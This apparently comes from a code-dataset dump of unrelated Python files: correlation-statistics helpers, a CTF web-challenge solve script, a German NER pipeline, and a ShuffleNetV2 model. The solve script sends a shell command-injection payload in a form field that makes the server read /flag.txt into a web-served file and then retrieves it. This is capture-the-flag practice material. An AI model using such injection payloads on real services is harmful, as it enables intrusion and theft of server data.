Multi-dimensional Spearman rank correlation between rows of `X` and `Y`.
Parameters
----------
X : (N,P) np.ndarray
Y : (M,P) np.ndarray
Returns
-------
(N,M) np.ndarray
Raises
------
TypeError : `X` or `Y` is not array_like
ValueError : `X` and `Y` are not same size along second axis
Notes
-----
    Spearman rank correlation is equivalent to performing Pearson correlation on
    ranks.
"""
return pearsonr_multi(rankdata(X, axis=1), rankdata(Y, axis=1))
def pairwise_r(X: np.ndarray, flatten: bool = False) -> np.ndarray:
"""
Compute pairwise Pearson's r between rows of `X`.
Parameters
----------
X : (N,M) np.ndarray
N rows each with M numeric elements
flatten : bool, default False
If True, return flattened upper triangular elements of corr. matrix
Returns
-------
(N*(N-1)/2,) or (N,N) np.ndarray
Pearson correlation coefficients
"""
rp = pearsonr_multi(X, X)
if not flatten:
return rp
triu_inds = np.triu_indices_from(rp, k=1)
return rp[triu_inds].flatten()
def pairwise_rho(X: np.ndarray, flatten: bool = False) -> np.ndarray:
"""
Compute pairwise Spearman's rho between rows of `X`.
Parameters
----------
X : (N,M) np.ndarray
N rows each with M numeric elements
flatten : bool, default False
If True, return flattened upper triangular elements of corr. matrix
Returns
-------
(N*(N-1)/2,) or (N,N) np.ndarray
        Spearman rank correlation coefficients
"""
rp = spearmanr_multi(X, X)
if not flatten:
return rp
triu_inds = np.triu_indices_from(rp, k=1)
return rp[triu_inds].flatten()
def wmean(x: np.ndarray, w: np.ndarray) -> float:
"""
Compute weighted mean of an array.
Parameters
----------
x : (N,) np.ndarray
scalar array
w : (N,) np.ndarray
weight for each element of ``x``
Returns
-------
float
weighted mean
"""
return np.sum(w * x) / np.sum(w)
def wcov(x: np.ndarray, y: np.ndarray, w: np.ndarray) -> float:
"""
Compute weighted covariance between two arrays.
Parameters
----------
x : (N,) np.ndarray
scalar array
y : (N,) np.ndarray
scalar array
w : (N,) np.ndarray
weights
Returns
-------
float
weighted covariance
"""
assert x.size == y.size
assert x.size == w.size
return np.sum(w * (x - wmean(x, w)) * (y - wmean(y, w))) / np.sum(w)
def wcorr(x: np.ndarray, y: np.ndarray, w: np.ndarray) -> float:
"""
Compute weighted correlation between two arrays.
Parameters
----------
x : (N,) np.ndarray
scalar array
y : (N,) np.ndarray
scalar array
w : (N,) np.ndarray
weights
Returns
-------
float
weighted correlation
"""
return wcov(x, y, w) / np.sqrt(wcov(x, x, w) * wcov(y, y, w))
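# Hypothetical sanity check (not part of the original module): with uniform
# weights the weighted correlation reduces to the ordinary Pearson r.
def _wcorr_example() -> bool:
    rng = np.random.default_rng(0)
    x = rng.standard_normal(100)
    y = x + rng.standard_normal(100)
    w = np.ones_like(x)
    return bool(np.isclose(wcorr(x, y, w), pearsonr(x, y)[0]))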
def p_2tailed(r: float, n: int) -> float:
"""
Compute 2-tailed p-value.
Parameters
----------
r : float
correlation coefficient
n : int
degrees of freedom (length of vector used to compute ``r``)
Returns
-------
float
two-tailed p-value
Notes
-----
Code adapted from scipy.stats.pearsonr
"""
r = max(min(r, 1.0), -1.0)
df = n - 2
if abs(r) == 1.0:
prob = 0.0
else:
t_squared = r ** 2 * (df / ((1.0 - r) * (1.0 + r)))
prob = special.betainc(0.5 * df, 0.5, df / (df + t_squared))
return prob
def pearsonr_weighted(
x: np.ndarray,
y: np.ndarray,
w: np.ndarray = None
) -> Tuple[float, float]:
"""
Compute the weighted Pearson correlation coefficient.
Parameters
----------
x : (N,) np.ndarray
scalar array
y : (N,) np.ndarray
scalar array
w : (N,) np.ndarray
weights
Returns
-------
r : float
weighted Pearson correlation coefficient
p : float
two-tailed p-value
"""
assert type(x) == type(y) == np.ndarray
assert x.size == y.size
if w is None:
x, y = mask_nan([x, y])
return pearsonr(x, y)
else:
assert type(w) == np.ndarray and w.size == x.size
x, y, w = mask_nan([x, y, w])
n = x.size
if np.isnan(w).all():
return np.nan, np.nan
r = wcorr(x, y, w)
p = p_2tailed(r, n)
return r, p
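# Hypothetical usage sketch (not part of the original module): zero weights
# should make pearsonr_weighted's r match plain Pearson on the retained half
# (the p-values differ because n still counts every sample).
def _pearsonr_weighted_example():
    rng = np.random.default_rng(0)
    x = rng.standard_normal(200)
    y = 0.5 * x + rng.standard_normal(200)
    w = np.ones(200)
    w[100:] = 0.0                        # ignore the second half entirely
    r_w, _ = pearsonr_weighted(x, y, w)
    r_ref, _ = pearsonr(x[:100], y[:100])
    return r_w, r_ref                    # these two values should agree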
| 21.888889 | 80 | 0.556285 |
c57173826fa48d31e78f1fb9f148774bcb2fdfc2
| 269 |
py
|
Python
|
web/web-lemonthinker/solve.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | 2 |
2021-08-09T17:08:12.000Z
|
2021-08-09T17:08:17.000Z
|
web/web-lemonthinker/solve.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
web/web-lemonthinker/solve.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | 1 |
2021-10-09T16:51:56.000Z
|
2021-10-09T16:51:56.000Z
|
import requests
import sys
import random
url = sys.argv[1]
filename = str(random.randrange(1000))
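# The /generate endpoint presumably passes the submitted text through a shell,
# so the $(...) command substitution below runs on the server: it copies the
# flag into a randomly named file under the web root, which is then fetched
# over HTTP by the GET request that follows.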
requests.post(url+"generate", {"text":f"$(echo \"$(cat /flag.txt)\" > /app/static/images/{filename})"})
r = requests.get(url + "static/images/" + filename)
print(r.text)
| 26.9 | 103 | 0.69145 |
3dc90459e1406bb5c14b2c1036225c9acf9f53f7
| 4,896 |
py
|
Python
|
Apps/Model Evaluation/ner_pipeline.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | 1 |
2021-04-13T10:00:46.000Z
|
2021-04-13T10:00:46.000Z
|
Apps/Model Evaluation/ner_pipeline.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | null | null | null |
Apps/Model Evaluation/ner_pipeline.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | null | null | null |
#!/usr/local/bin/python3.5
# -*- coding: utf-8 -*-
# import python libs
import nltk
import pickle
import json
import logging
from nltk import Tree
from pprint import pprint as pp
from nltk.chunk.api import ChunkParserI
from os import listdir
from os.path import isfile, join
# import project libs
# import nltk_tree_converter
import maxent_chunker
# defining globals & constants
POS_TAGGER_PATH = 'nltk_german_pos_classifier_data.pickle'
CHUNKER_PICKLE_NAME = 'self_trained_ne_chunker_multiclass.pickle'
TEXT_SET = 'NER-de-train'
global german_pos_tagger, self_trained_chunker
german_pos_tagger = False
self_trained_chunker = False
# methods
def ner_pipeline(raw_sentence):
print('NER pipeline: tokenizing / tagging / chunking / converting ...')
# create a lists of strings
tokenized_sentence = word_tokenization(raw_sentence)
# create a list of nltk trees containing named entity chunks
chunk_tree = named_entity_token_chunking(tokenized_sentence)
# convert NLTKs tree format to Hannes' JSON
hannes_json = tree_to_sentence(chunk_tree)
return hannes_json
def word_tokenization(sentence):
return nltk.word_tokenize(sentence)
def part_of_speech_tagging(sentence):
global german_pos_tagger
if not german_pos_tagger:
with open(POS_TAGGER_PATH, 'rb') as f:
german_pos_tagger = pickle.load(f)
return german_pos_tagger.tag(sentence)
def named_entity_token_chunking(tokenized_sentence):
global self_trained_chunker
if not self_trained_chunker:
with open(CHUNKER_PICKLE_NAME, 'rb') as f:
self_trained_chunker = pickle.load(f)
return self_trained_chunker.parse(tokenized_sentence)
def tree_to_sentence(tree):
sentence = []
def add_token_from(node):
token = {
'term': node[0]
}
sentence.append(token)
def add_tokens_from(tree):
length = len(tree)
token = {
'term': tree[0][0],
'annotation': {
'label': annotation_label(tree),
'length': length
}
}
sentence.append(token)
if length > 1:
for node_index in range(1, length):
add_token_from(tree[node_index])
def annotation_label(node):
return node.label()
for node in tree:
if type(node) is Tree:
add_tokens_from(node)
else:
add_token_from(node)
return sentence
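# Hypothetical usage sketch (not part of the original script, never called):
# converting a small hand-built chunk tree into the token/annotation list
# format produced above. Leaves are (word, POS) pairs; the tags are made up.
def _tree_to_sentence_example():
    tree = Tree('S', [Tree('PER', [('Angela', 'NE'), ('Merkel', 'NE')]),
                      ('besucht', 'VVFIN'),
                      Tree('LOC', [('Berlin', 'NE')]),
                      ('.', '$.')])
    return tree_to_sentence(tree)
    # -> [{'term': 'Angela', 'annotation': {'label': 'PER', 'length': 2}},
    #     {'term': 'Merkel'}, {'term': 'besucht'},
    #     {'term': 'Berlin', 'annotation': {'label': 'LOC', 'length': 1}},
    #     {'term': '.'}]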
# helper
def read_corpus_files(path):
corpus = []
for file_name in sorted(listdir(path)):
file_path = join(path, file_name)
if not (isfile(file_path) and (file_name.endswith('.json') or file_name.endswith('.txt'))): continue
file_handler = open(path + file_name, 'r', encoding='utf-8')
raw_content = file_handler.read()
file_handler.close()
print("processing contents of file %s" % (file_name))
        decoded_content = json.JSONDecoder().decode(raw_content)
        text_content = decoded_content['content']
for paragraph in text_content:
for sentence in paragraph:
corpus.append(sentence)
return corpus
def sentences_to_tree(paragraph, tree_with_entities = Tree('S', [])):
skip_count = 0
for sentence in paragraph:
for index, token in enumerate(sentence):
if skip_count > 0:
skip_count = skip_count - 1
continue
if 'annotation' in token:
annotation = token['annotation']
if annotation['label'] == 'NAE':
logging.info('nltk_tree_converter.sentences_to_tree: skipping NAE label')
continue
length = annotation['length']
sub_tree = Tree(annotation['label'], [token['term']])
if length > 1:
skip_count = length - 1
for next_index in range((index + 1), (index + length)):
word = sentence[next_index]['term']
sub_tree.append(word)
tree_with_entities.append(sub_tree)
else:
tree_with_entities.extend([token['term']])
return tree_with_entities
def train_maxent_chunker():
print('loading...')
with open('training/germeval/' + TEXT_SET + '.pickle', 'rb') as f:
germ_eval_corpus = pickle.load(f)
print('start training...')
self_trained_chunker = maxent_chunker.NEChunkParser(germ_eval_corpus)
print('Saving chunker to %s...' % CHUNKER_PICKLE_NAME)
with open(CHUNKER_PICKLE_NAME, 'wb') as outfile:
pickle.dump(self_trained_chunker, outfile, -1)
def train_maxent_chunker_with(training_set):
print('start training...')
return maxent_chunker.NEChunkParser(training_set)
# entry point as a stand alone script
if __name__ == '__main__':
train_maxent_chunker()
| 27.977143 | 108 | 0.644199 |
9a71cd07405dfc222cb51425aa64f01e5cd69105
| 7,430 |
py
|
Python
|
official/cv/shufflenetv2/src/shufflenetv2.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/shufflenetv2/src/shufflenetv2.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/shufflenetv2/src/shufflenetv2.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
from mindspore import Tensor
import mindspore.nn as nn
import mindspore.ops.operations as P
class ShuffleV2Block(nn.Cell):
def __init__(self, inp, oup, mid_channels, *, ksize, stride):
super(ShuffleV2Block, self).__init__()
self.stride = stride
##assert stride in [1, 2]
self.mid_channels = mid_channels
self.ksize = ksize
pad = ksize // 2
self.pad = pad
self.inp = inp
outputs = oup - inp
branch_main = [
# pw
nn.Conv2d(in_channels=inp, out_channels=mid_channels, kernel_size=1, stride=1,
pad_mode='pad', padding=0, has_bias=False),
nn.BatchNorm2d(num_features=mid_channels, momentum=0.9),
nn.ReLU(),
# dw
nn.Conv2d(in_channels=mid_channels, out_channels=mid_channels, kernel_size=ksize, stride=stride,
pad_mode='pad', padding=pad, group=mid_channels, has_bias=False),
nn.BatchNorm2d(num_features=mid_channels, momentum=0.9),
# pw-linear
nn.Conv2d(in_channels=mid_channels, out_channels=outputs, kernel_size=1, stride=1,
pad_mode='pad', padding=0, has_bias=False),
nn.BatchNorm2d(num_features=outputs, momentum=0.9),
nn.ReLU(),
]
self.branch_main = nn.SequentialCell(branch_main)
if stride == 2:
branch_proj = [
# dw
nn.Conv2d(in_channels=inp, out_channels=inp, kernel_size=ksize, stride=stride,
pad_mode='pad', padding=pad, group=inp, has_bias=False),
nn.BatchNorm2d(num_features=inp, momentum=0.9),
# pw-linear
nn.Conv2d(in_channels=inp, out_channels=inp, kernel_size=1, stride=1,
pad_mode='pad', padding=0, has_bias=False),
nn.BatchNorm2d(num_features=inp, momentum=0.9),
nn.ReLU(),
]
self.branch_proj = nn.SequentialCell(branch_proj)
else:
self.branch_proj = None
self.squeeze = P.Squeeze(axis=0)
def construct(self, old_x):
if self.stride == 1:
x_proj, x = self.channel_shuffle(old_x)
x_proj = self.squeeze(x_proj)
x = self.squeeze(x)
return P.Concat(1)((x_proj, self.branch_main(x)))
if self.stride == 2:
x_proj = old_x
x = old_x
return P.Concat(1)((self.branch_proj(x_proj), self.branch_main(x)))
return None
def channel_shuffle(self, x):
batchsize, num_channels, height, width = P.Shape()(x)
x = P.Reshape()(x, (batchsize * num_channels // 2, 2, height * width,))
x = P.Transpose()(x, (1, 0, 2,))
x = P.Reshape()(x, (2, -1, num_channels // 2, height, width,))
return x[0:1, :, :, :, :], x[-1:, :, :, :, :]
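# Hypothetical NumPy sketch (not part of the original network, never called):
# the same channel shuffle as above written with plain arrays. The two branch
# outputs are interleaved along the channel axis and split back into two
# tensors of shape (N, C // 2, H, W).
def _channel_shuffle_numpy(x):
    n, c, h, w = x.shape               # x is assumed to be (N, C, H, W), C even
    x = x.reshape(n * c // 2, 2, h * w)
    x = x.transpose(1, 0, 2)
    x = x.reshape(2, -1, c // 2, h, w)
    return x[0], x[1]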
class ShuffleNetV2(nn.Cell):
def __init__(self, input_size=224, n_class=1000, model_size='1.0x'):
super(ShuffleNetV2, self).__init__()
print('model size is ', model_size)
self.stage_repeats = [4, 8, 4]
self.model_size = model_size
if model_size == '0.5x':
self.stage_out_channels = [-1, 24, 48, 96, 192, 1024]
elif model_size == '1.0x':
self.stage_out_channels = [-1, 24, 116, 232, 464, 1024]
elif model_size == '1.5x':
self.stage_out_channels = [-1, 24, 176, 352, 704, 1024]
elif model_size == '2.0x':
self.stage_out_channels = [-1, 24, 244, 488, 976, 2048]
else:
raise NotImplementedError
# building first layer
input_channel = self.stage_out_channels[1]
self.first_conv = nn.SequentialCell([
nn.Conv2d(in_channels=3, out_channels=input_channel, kernel_size=3, stride=2,
pad_mode='pad', padding=1, has_bias=False),
nn.BatchNorm2d(num_features=input_channel, momentum=0.9),
nn.ReLU(),
])
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, pad_mode='same')
self.features = []
for idxstage in range(len(self.stage_repeats)):
numrepeat = self.stage_repeats[idxstage]
output_channel = self.stage_out_channels[idxstage+2]
for i in range(numrepeat):
if i == 0:
self.features.append(ShuffleV2Block(input_channel, output_channel,
mid_channels=output_channel // 2, ksize=3, stride=2))
else:
self.features.append(ShuffleV2Block(input_channel // 2, output_channel,
mid_channels=output_channel // 2, ksize=3, stride=1))
input_channel = output_channel
self.features = nn.SequentialCell([*self.features])
self.conv_last = nn.SequentialCell([
nn.Conv2d(in_channels=input_channel, out_channels=self.stage_out_channels[-1], kernel_size=1, stride=1,
pad_mode='pad', padding=0, has_bias=False),
nn.BatchNorm2d(num_features=self.stage_out_channels[-1], momentum=0.9),
nn.ReLU()
])
self.globalpool = nn.AvgPool2d(kernel_size=7, stride=7, pad_mode='valid')
if self.model_size == '2.0x':
self.dropout = nn.Dropout(keep_prob=0.8)
self.classifier = nn.SequentialCell([nn.Dense(in_channels=self.stage_out_channels[-1],
out_channels=n_class, has_bias=False)])
## init weights
self._initialize_weights()
def construct(self, x):
x = self.first_conv(x)
x = self.maxpool(x)
x = self.features(x)
x = self.conv_last(x)
x = self.globalpool(x)
if self.model_size == '2.0x':
x = self.dropout(x)
x = P.Reshape()(x, (-1, self.stage_out_channels[-1],))
x = self.classifier(x)
return x
def _initialize_weights(self):
for name, m in self.cells_and_names():
if isinstance(m, nn.Conv2d):
if 'first' in name:
m.weight.set_data(Tensor(np.random.normal(0, 0.01,
m.weight.data.shape).astype("float32")))
else:
m.weight.set_data(Tensor(np.random.normal(0, 1.0/m.weight.data.shape[1],
m.weight.data.shape).astype("float32")))
if isinstance(m, nn.Dense):
m.weight.set_data(Tensor(np.random.normal(0, 0.01, m.weight.data.shape).astype("float32")))
| 41.977401 | 115 | 0.564872 |